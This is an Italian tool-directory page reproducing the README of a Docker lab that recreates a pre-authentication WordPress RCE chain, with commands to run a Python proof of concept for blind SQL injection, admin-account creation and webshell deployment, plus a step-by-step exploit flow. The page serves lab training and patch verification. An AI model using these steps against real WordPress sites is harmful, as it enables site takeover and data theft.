Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-60137-and-CVE-2026-63030 — Laboratorio WordPress basato su Docker che riproduce CVE-2026-60137 e CVE-2026-63030 RCE pre-auth, con un exploit PoC in Python per SQLi, escalation di privilegi e distribuzione di webshell. | Kitploit
Strumenti/GitHubGitHub/ivanesk315/cve-2026-60137-and-cve-2026-63030
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e FormazioneSviluppo PayloadLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubivanesk315/cve-2026-60137-and-cve-2026-63030

CVE-2026-60137-and-CVE-2026-63030

Laboratorio WordPress basato su Docker che riproduce CVE-2026-60137 e CVE-2026-63030 RCE pre-auth, con un exploit PoC in Python per SQLi, escalation di privilegi e distribuzione di webshell.

Vedi Repository
21h 30m faNon ancora revisionato

wp2shell Lab — CVE-2026-60137 & CVE-2026-63030

WordPress Core Pre-Auth RCE lab — exploit reale, RCE server.

WARNING: Il lab esegue WordPress VULNERABILE. Non esporre su internet.

Struttura

root@kitploit:~
.
├── docker-compose.yml     # Lab: WordPress 6.9.4 + MariaDB 11 + phpMyAdmin
├── exploit/               # PoC exploit (clone da GitHub)
│   └── wp2shell.py        # Full RCE exploit
├── REPORT.md              # Report di analisi root cause
└── README.md

Setup

1. Avvia il lab

root@kitploit:~
docker compose up -d

Attendi finché non vedi LAB READY nei log:

root@kitploit:~
docker compose logs -f wpcli

2. Clona il PoC exploit

root@kitploit:~
git clone https://github.com/0xsha/wp2shell.git exploit

Questo exploit:

  • Python 3.7+, non richiede alcun pip install (usa solo la stdlib)
  • Crea un nuovo account admin SENZA dover crackare la password
  • Effettua il deploy automatico di una webshell
  • Shell interattiva

3. Exploit

root@kitploit:~
cd exploit

# Check vulnerability (non-destructive)
python wp2shell.py check http://localhost:8080

# Extract data qua blind SQLi
python wp2shell.py read http://localhost:8080 --preset users

# RCE — crea admin + deploy webshell + esegue comando
python wp2shell.py shell http://localhost:8080 --cmd id

# Interactive shell
python wp2shell.py shell http://localhost:8080 -i

Servizi

Riepilogo exploit flow

root@kitploit:~
1. POST /wp-json/batch/v1
   └─ Sub-request[0]: malformed path → parse error
   └─ Sub-request[1]: /wp/v2/posts + author_exclude=<SQLi>
   └─ Sub-request[2]: sacrificial route
   → $matches[] bị lệch index → req[1] nhận handler của req[2]
   → bypass permission_callback → SQLi vào WP_Query

2. SQL Injection (author__not_in)
   → Scalar string bypass is_array() check
   → Raw SQL inject vào WHERE clause

3. Object Hydration → oEmbed Write → Parent Loop Repair
   → Poisoned WP_Post objects persist vào database

4. Changeset Privilege Escalation
   → WordPress switch current_user sang admin

5. Nested REST Request
   → Tạo admin account mới (không cần crack password)

6. Login + Upload webshell plugin → RCE

Verifica patch

root@kitploit:~
# Update WordPress trong container
docker exec -it wp2shell-lab-wp-1 bash -c \
  "curl -sO https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar && \
   chmod +x wp-cli.phar && \
   ./wp-cli.phar core update --version=6.9.5 --allow-root"

# Re-run exploit — phải fail
python exploit/wp2shell.py check http://localhost:8080

Cleanup

root@kitploit:~
docker compose down -v

Riferimenti

  • 0xsha/wp2shell — GitHub
  • Picus: wp2shell RCE Explained
  • zsec.uk: Code Trace Deep Dive
  • VulnCheck Blog
  • Tenable FAQ
Scarica lo strumento
ServiceURLCredentials
WordPresshttp://localhost:8080admin / Admin!2345
WP Adminhttp://localhost:8080/wp-adminadmin / Admin!2345
phpMyAdminhttp://localhost:8081root / root
REST APIhttp://localhost:8080/wp-json/—
Batch endpointhttp://localhost:8080/wp-json/batch/v1—